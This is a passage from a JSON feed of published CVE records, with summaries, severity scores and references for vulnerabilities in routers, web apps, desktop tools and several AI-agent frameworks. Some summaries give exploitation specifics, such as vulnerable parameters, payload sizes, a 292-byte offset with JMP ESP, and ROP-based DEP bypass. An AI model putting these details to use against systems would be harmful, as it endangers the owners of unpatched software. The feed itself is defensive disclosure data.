'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.impresscms.org/","https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip","https://www.exploit-db.com/exploits/46239","https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-parameter"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25705","summary":"Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://initd.sh/","https://sourceforge.net/projects/echomirage.oldbutgold.p/","https://www.exploit-db.com/exploits/46216","https://www.vulncheck.com/advisories/echo-mirage-stack-buffer-overflow-via-rules-action-field"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25706","summary":"Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":8.7,"epss":0.00121,"ranking_epss":0.31177,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.ac.i8i.ir/","https://www.exploit-db.com/exploits/46132","https://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-file-disclosure"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25707","summary":"eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://ebrigade.net/","https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip","https://www.exploit-db.com/exploits/46117","https://www.vulncheck.com/advisories/ebrigade-erp-sql-injection-via-pdf-php"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25708","summary":"Heatmiser Wifi Thermostat 1.7 contains a cross-site request forgery vulnerability that allows attackers to change administrator credentials by tricking authenticated users into submitting malicious requests. Attackers can craft HTML forms targeting the networkSetup.htm endpoint with parameters usnm, usps, and cfps to modify the admin username and password without user consent.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00014,"ranking_epss":0.02686,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46100","https://www.vulncheck.com/advisories/heatmiser-wifi-thermostat-cross-site-request-forgery"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25709","summary":"CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter.","cvss":9.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":9.3,"epss":0.00058,"ranking_epss":0.18103,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://forum.codefuture.co.uk/showthread.php?tid=73141","https://davidtavarez.github.io/","https://www.exploit-db.com/exploits/46094","https://www.vulncheck.com/advisories/cf-image-hosting-script-unauthorized-database-access"],"published_time":"2026-04-12T13:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25691","summary":"Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46269","https://www.faleemi.com/","https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25693","summary":"ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00013,"ranking_epss":0.02227,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46274","https://www.resourcespace.com/","https://www.resourcespace.com/get","https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25695","summary":"R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02013,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cloud.r-project.org/bin/windows/","https://www.exploit-db.com/exploits/46265","https://www.vulncheck.com/advisories/r-local-buffer-overflow-windows-xp-sp3"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25697","summary":"CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials.","cvss":8.8,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":8.8,"epss":0.00065,"ranking_epss":0.20154,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/VictorAlagwu/CMSsite/archive/master.zip","https://www.exploit-db.com/exploits/46259","https://www.vulncheck.com/advisories/cmssite-sql-injection-via-category-php"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25699","summary":"Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07016,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://newsbull.org/","https://github.com/gurkanuzunca/newsbull","https://www.exploit-db.com/exploits/46266","https://www.vulncheck.com/advisories/newsbull-haber-script-authenticated-sql-injection-via-search-parameter"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25701","summary":"Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.divxtodvd.net/","http://www.divxtodvd.net/easy_video_to_ipod.exe","https://www.exploit-db.com/exploits/46255","https://www.vulncheck.com/advisories/easy-video-to-ipod-converter-local-buffer-overflow-seh"],"published_time":"2026-04-12T13:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2018-25257","summary":"Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":7.1,"epss":0.00026,"ranking_epss":0.07102,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46217","https://www.vulncheck.com/advisories/adianti-framework-and-sql-injection-via-profile"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2018-25258","summary":"RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02286,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe","https://www.exploit-db.com/exploits/46107","https://www.r-project.org/","https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2019-25689","summary":"HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process.","cvss":8.6,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.4,"cvss_v4":8.6,"epss":0.00013,"ranking_epss":0.02143,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["http://www.html5videoplayer.net/download.html","https://www.exploit-db.com/exploits/46279","https://www.vulncheck.com/advisories/html5-video-player-local-buffer-overflow-non-seh"],"published_time":"2026-04-12T13:16:31","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2017-20239","summary":"MDwiki contains a cross-site scripting vulnerability that allows remote attackers to execute arbitrary JavaScript by injecting malicious code through the location hash parameter. Attackers can craft URLs with JavaScript payloads in the hash fragment that are parsed and rendered without sanitization, causing the injected scripts to execute in the victim's browser context.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":5.1,"epss":0.00036,"ranking_epss":0.10732,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.exploit-db.com/exploits/46097","https://www.vulncheck.com/advisories/mdwiki-cross-site-scripting-via-location-hash-parameter"],"published_time":"2026-04-12T13:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6126","summary":"A weakness has been identified in zhayujie chatgpt-on-wechat CowAgent 2.0.4. The affected element is an unknown function of the component Administrative HTTP Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00073,"ranking_epss":0.22136,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/zhayujie/chatgpt-on-wechat/issues/2733","https://github.com/zhayujie/chatgpt-on-wechat/issues/2733#issue-4177804035","https://vuldb.com/submit/793554","https://vuldb.com/submit/795335","https://vuldb.com/vuln/356990","https://vuldb.com/vuln/356990/cti"],"published_time":"2026-04-12T11:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6125","summary":"A security flaw has been discovered in Dromara warm-flow up to 1.8.4. Impacted is the function SpelHelper.parseExpression of the file /warm-flow/save-json of the component Workflow Definition Handler. The manipulation of the argument listenerPath/skipCondition/permissionFlag results in code injection. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00044,"ranking_epss":0.13243,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gitee.com/dromara/warm-flow/","https://gitee.com/dromara/warm-flow/issues/IHURVQ","https://vuldb.com/submit/793322","https://vuldb.com/vuln/356989","https://vuldb.com/vuln/356989/cti"],"published_time":"2026-04-12T10:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6124","summary":"A vulnerability was determined in Tenda F451 1.0.0.7. This vulnerability affects the function fromSafeMacFilter of the file /goform/SafeMacFilter of the component httpd. Executing a manipulation of the argument page/menufacturer can lead to stack-based buffer overflow. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/16","https://vuldb.com/submit/792874","https://vuldb.com/vuln/356987","https://vuldb.com/vuln/356987/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T09:16:18","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6123","summary":"A vulnerability was found in Tenda F451 1.0.0.7. This affects the function fromAddressNat of the file /goform/addressNat of the component httpd. Performing a manipulation of the argument entrys results in stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00088,"ranking_epss":0.25077,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/15","https://vuldb.com/submit/792873","https://vuldb.com/submit/792879","https://vuldb.com/vuln/356986","https://vuldb.com/vuln/356986/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T09:16:17","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6122","summary":"A vulnerability has been found in Tenda F451 1.0.0.7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/14","https://vuldb.com/submit/792872","https://vuldb.com/vuln/356985","https://vuldb.com/vuln/356985/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T08:16:37","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6121","summary":"A flaw has been found in Tenda F451 1.0.0.7. Affected by this vulnerability is the function WrlclientSet of the file /goform/WrlclientSet of the component httpd. This manipulation of the argument GO causes stack-based buffer overflow. The attack may be initiated remotely. The exploit has been published and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/12","https://vuldb.com/submit/792865","https://vuldb.com/vuln/356984","https://vuldb.com/vuln/356984/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T08:16:36","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6120","summary":"A vulnerability was detected in Tenda F451 1.0.0.7. Affected is the function fromDhcpListClient of the file /goform/DhcpListClient of the component httpd. The manipulation of the argument page results in stack-based buffer overflow. The attack can be launched remotely. The exploit is now public and may be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Jimi-Lab/cve/issues/11","https://vuldb.com/submit/792864","https://vuldb.com/vuln/356983","https://vuldb.com/vuln/356983/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-12T06:16:22","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6119","summary":"A vulnerability was identified in AstrBotDevs AstrBot up to 4.22.1. The affected element is the function post_data.get of the component API Endpoint. Such manipulation leads to server-side request forgery. The attack may be performed from remote. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00012,"ranking_epss":0.01634,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7171","https://vuldb.com/submit/792661","https://vuldb.com/vuln/356979","https://vuldb.com/vuln/356979/cti"],"published_time":"2026-04-12T06:16:21","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31413","summary":"In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR\n\nmaybe_fork_scalars() is called for both BPF_AND and BPF_OR when the\nsource operand is a constant.  When dst has signed range [-1, 0], it\nforks the verifier state: the pushed path gets dst = 0, the current\npath gets dst = -1.\n\nFor BPF_AND this is correct: 0 & K == 0.\nFor BPF_OR this is wrong:    0 | K == K, not 0.\n\nThe pushed path therefore tracks dst as 0 when the runtime value is K,\nproducing an exploitable verifier/runtime divergence that allows\nout-of-bounds map access.\n\nFix this by passing env->insn_idx (instead of env->insn_idx + 1) to\npush_stack(), so the pushed path re-executes the ALU instruction with\ndst = 0 and naturally computes the correct result for any opcode.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":8e-05,"ranking_epss":0.00648,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4","https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7","https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5","https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455"],"published_time":"2026-04-12T06:16:20","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6116","summary":"A vulnerability has been found in Totolink A7100RU 7.4cu.2313_b20191024. This vulnerability affects the function setDiagnosisCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. The manipulation of the argument ip leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_181/README.md","https://vuldb.com/submit/792249","https://vuldb.com/vuln/356976","https://vuldb.com/vuln/356976/cti","https://www.totolink.net/"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6117","summary":"A vulnerability was found in AstrBotDevs AstrBot up to 4.22.1. This issue affects the function install_plugin_upload of the file astrbot/dashboard/routes/plugin.py of the component install-upload Endpoint. The manipulation of the argument File results in sandbox issue. The attack can be executed remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00039,"ranking_epss":0.11645,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7168","https://vuldb.com/submit/792653","https://vuldb.com/vuln/356977","https://vuldb.com/vuln/356977/cti"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6118","summary":"A vulnerability was determined in AstrBotDevs AstrBot up to 4.22.1. Impacted is the function add_mcp_server of the file astrbot/dashboard/routes/tools.py of the component MCP Endpoint. This manipulation of the argument command causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00856,"ranking_epss":0.74972,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/AstrBotDevs/AstrBot/","https://github.com/AstrBotDevs/AstrBot/issues/7169","https://vuldb.com/submit/792655","https://vuldb.com/vuln/356978","https://vuldb.com/vuln/356978/cti"],"published_time":"2026-04-12T05:16:01","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6115","summary":"A flaw has been found in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setAppCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Executing a manipulation of the argument enable can lead to os command injection. The attack may be launched remotely. The exploit has been published and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_180/README.md","https://vuldb.com/submit/792248","https://vuldb.com/vuln/356975","https://vuldb.com/vuln/356975/cti","https://www.totolink.net/"],"published_time":"2026-04-12T05:16:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6113","summary":"A security vulnerability has been detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this vulnerability is the function setTtyServiceCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Such manipulation of the argument ttyEnable leads to os command injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_178/README.md","https://vuldb.com/submit/792246","https://vuldb.com/vuln/356973","https://vuldb.com/vuln/356973/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6114","summary":"A vulnerability was detected in Totolink A7100RU 7.4cu.2313_b20191024. Affected by this issue is the function setNetworkCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Performing a manipulation of the argument proto results in os command injection. The attack may be initiated remotely. The exploit is now public and may be used.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_179/README.md","https://vuldb.com/submit/792247","https://vuldb.com/vuln/356974","https://vuldb.com/vuln/356974/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:49","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6112","summary":"A weakness has been identified in Totolink A7100RU 7.4cu.2313_b20191024. Affected is the function setRadvdCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. This manipulation of the argument maxRtrAdvInterval causes os command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks.","cvss":8.9,"cvss_version":4.0,"cvss_v2":10.0,"cvss_v3":9.8,"cvss_v4":8.9,"epss":0.00892,"ranking_epss":0.75567,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/A7100RU/vul_177/README.md","https://vuldb.com/submit/792245","https://vuldb.com/vuln/356972","https://vuldb.com/vuln/356972/cti","https://www.totolink.net/"],"published_time":"2026-04-12T04:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6110","summary":"A vulnerability was identified in FoundationAgents MetaGPT up to 0.8.1. This affects the function generate_thoughts of the file metagpt/strategy/tot.py of the component Tree-of-Thought Solver. The manipulation leads to code injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00052,"ranking_epss":0.16159,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1933","https://github.com/FoundationAgents/MetaGPT/pull/1946","https://vuldb.com/submit/791761","https://vuldb.com/vuln/356970","https://vuldb.com/vuln/356970/cti"],"published_time":"2026-04-12T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6111","summary":"A security flaw has been discovered in FoundationAgents MetaGPT up to 0.8.1. This impacts the function decode_image of the file metagpt/utils/common.py. The manipulation of the argument img_url_or_b64 results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00043,"ranking_epss":0.12853,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1934","https://github.com/FoundationAgents/MetaGPT/pull/1941","https://vuldb.com/submit/791762","https://vuldb.com/vuln/356971","https://vuldb.com/vuln/356971/cti"],"published_time":"2026-04-12T03:16:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1116","summary":"A Cross-site Scripting (XSS) vulnerability was identified in the `from_dict` method of the `AppLollmsMessage` class in parisneo/lollms prior to version 2.2.0. The vulnerability arises from the lack of sanitization or HTML encoding of the `content` field when deserializing user-provided data. This allows an attacker to inject malicious HTML or JavaScript payloads, which can be executed in the context of another user's browser. Exploitation of this vulnerability can lead to account takeover, session hijacking, or wormable attacks.","cvss":8.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01464,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/parisneo/lollms/commit/9767b882dbc893c388a286856beeaead69b8292a","https://huntr.com/bounties/d3d076a7-2a51-4e07-8d0e-91e28e76788e"],"published_time":"2026-04-12T03:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6109","summary":"A vulnerability was determined in FoundationAgents MetaGPT up to 0.8.1. The impacted element is the function evaluateCode of the file metagpt/environment/minecraft/mineflayer/index.js of the component Mineflayer HTTP API. Executing a manipulation can lead to cross-site request forgery. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":5e-05,"ranking_epss":0.00253,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/FoundationAgents/MetaGPT/","https://github.com/FoundationAgents/MetaGPT/issues/1932","https://vuldb.com/submit/791759","https://vuldb.com/vuln/356969","https://vuldb.com/vuln/356969/cti"],"published_time":"2026-04-12T02:16:00","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6107","summary":"A flaw has been found in 1Panel-dev MaxKB up to 2.6.1. This issue affects some unknown processing of the file apps/common/middleware/chat_headers_middleware.py of the component ChatHeadersMiddleware. This manipulation of the argument Name causes cross site scripting. Remote exploitation of the attack is possible. Upgrading to version 2.8.0 is capable of addressing this issue. Patch name: 026a2d623e2aa5efa67c4834651e79d5d7cab1da. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.09303,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/","https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/pull/4919","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/AnalogyC0de/public_exp/issues/24","https://vuldb.com/submit/782263","https://vuldb.com/vuln/356966","https://vuldb.com/vuln/356966/cti"],"published_time":"2026-04-12T01:16:16","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6108","summary":"A vulnerability was found in 1Panel-dev MaxKB up to 2.6.1. The affected element is the function execute of the file apps/application/flow/step_node/mcp_node/impl/base_mcp_node.py of the component Model Context Protocol Node. Performing a manipulation results in os command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. You should upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected 